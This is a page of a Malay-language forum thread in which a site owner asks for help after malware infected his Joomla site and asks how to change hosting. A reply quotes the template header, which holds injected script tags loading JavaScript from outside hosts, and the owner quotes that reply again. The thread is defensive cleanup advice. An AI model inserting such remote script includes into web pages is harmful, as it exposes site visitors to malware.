Page 1 of 3 123 LastLast
Results 1 to 10 of 26
  1. #1
    Normal Member ApoKalypse's Avatar
    Join Date
    Jun 2008
    Posts
    110
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Unhappy Nak tukar hosting macamana?



    Assalam, saya sekarang gunakan Fivio sebagai hosting dan domain website saya. Masalahnya website saya telah infected oleh Malware, saya pun tak pasti kenapa. Saya dah msg bantuan kepada bahagian teknikal Fivio tetapi tiada jawapan/

    Jadi saya nak minta bantuan disini... Harap ada yg sudi membantu..

    www.bertuah.com.my

  2. # ADS
    Circuit advertisement
    Join Date
    Always
    Posts
    Many
     

  3. #2
    WC Premium vyner's Avatar
    Join Date
    Apr 2012
    Location
    Di Sebelah Mu
    Posts
    2,609
    Thanks
    62
    Thanked 317 Times in 202 Posts

    Default

    dah lama ke bro hantar ticket kat diorang ? ?
    Nak Diskaun RefererX dan Seductivex ? PM saya !

    PERCUMA ! Panduan Mudah Apply Akaun Adsense!

  4. #3
    tux
    tux is offline
    Normal Member
    Join Date
    Jul 2007
    Posts
    46
    Thanks
    1
    Thanked 2 Times in 2 Posts

    Default

    Fivio ni lembap juga rupanya.
    buang natang ni dari jomla header template. Agaknyalah saya tak reti jomla.
    Code:
    <!--Width of template -->
    <style type="text/css">
    .main {width: 980px;margin: 0 auto;}
    #ja-wrapper {min-width: 981px;}
    </style>
    
    <script type="text/javascript" src="http://siu.edu.bd/includes/framework.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script></head>
    
    <body id="bd" class="fs3 FF">
    
    <div id="ja-wrapper">
    	<a name="Top" id="Top"></a>
    
    	<!-- HEADER -->

  5. #4
    WC Premium paklong's Avatar
    Join Date
    Dec 2007
    Location
    Samudera
    Posts
    4,281
    Thanks
    520
    Thanked 184 Times in 143 Posts

    Default

    ha ha ha ...........................gua pon pernah terkena .

    Gua blah.

  6. #5
    tux
    tux is offline
    Normal Member
    Join Date
    Jul 2007
    Posts
    46
    Thanks
    1
    Thanked 2 Times in 2 Posts

  7. #6
    Normal Member ApoKalypse's Avatar
    Join Date
    Jun 2008
    Posts
    110
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    maksudnya ada code yg saya perlu buang dari website saya ke tuan?

  8. #7
    Normal Member ApoKalypse's Avatar
    Join Date
    Jun 2008
    Posts
    110
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    Quote Originally Posted by tux View Post
    Fivio ni lembap juga rupanya.
    buang natang ni dari jomla header template. Agaknyalah saya tak reti jomla.
    Code:
    <!--Width of template -->
    <style type="text/css">
    .main {width: 980px;margin: 0 auto;}
    #ja-wrapper {min-width: 981px;}
    </style>
    
    <script type="text/javascript" src="http://siu.edu.bd/includes/framework.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script></head>
    
    <body id="bd" class="fs3 FF">
    
    <div id="ja-wrapper">
    	<a name="Top" id="Top"></a>
    
    	<!-- HEADER -->
    mcmana eh nk buang dia? boleh bantu ke...

  9. #8
    Normal Member wzul's Avatar
    Join Date
    Dec 2012
    Posts
    202
    Thanks
    30
    Thanked 46 Times in 23 Posts

    Default

    cuba cari script tu pada fail template. biasanya script macam tu menyelinap disitu.

    berbalik kepada tajuk, untuk pindah hosting, bincang dengan penyedia hosting yang baru. kebanyakan penyedia hosting kini menawarkan fungsi tu.
    Providing Domain & Cloud Webhosting Solutions
    http://www.wanzul-hosting.com

  10. #9
    Normal Member supermod's Avatar
    Join Date
    Mar 2013
    Location
    Cheras
    Posts
    22
    Thanks
    3
    Thanked 4 Times in 3 Posts

    Default

    Tukar hosting terus...

  11. #10
    WC Premium Dr. Peace's Avatar
    Join Date
    Dec 2009
    Location
    http://profile.to/drpeace/ KK,Sabah
    Posts
    1,725
    Thanks
    5
    Thanked 80 Times in 36 Posts

    Default

    pi kat style dan buang kod tu..
    1. Website Pasif 100% Automatik Amazon
    2. SEO professional
    3. Website Development & Graphic Designing
    (Timeline, Header, Banner, Logo etc.)
    4. Internet Marketing
    wechat id - drpeace

Page 1 of 3 123 LastLast

Similar Threads

  1. Minta bantuan berkenaan tukar hosting
    By successsor in forum Pembangunan Web
    Replies: 6
    Last Post: 04-06-2011, 01:03 PM
  2. tukar blog wp ke hosting lain
    By johnjimat in forum Ada Sesiapa Yang Tahu...
    Replies: 16
    Last Post: 03-13-2010, 11:46 PM
  3. Cara nak tukar ke hosting lain...
    By penang in forum Ada Sesiapa Yang Tahu...
    Replies: 11
    Last Post: 12-07-2009, 02:23 PM
  4. Macamana cara nak tukar 'skin' forum PHPBB?
    By dobi2u.com in forum Pembangunan Web
    Replies: 4
    Last Post: 01-22-2008, 09:51 AM
  5. Tukar Hosting
    By Abooain in forum Pembangunan Web
    Replies: 20
    Last Post: 02-19-2007, 06:15 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •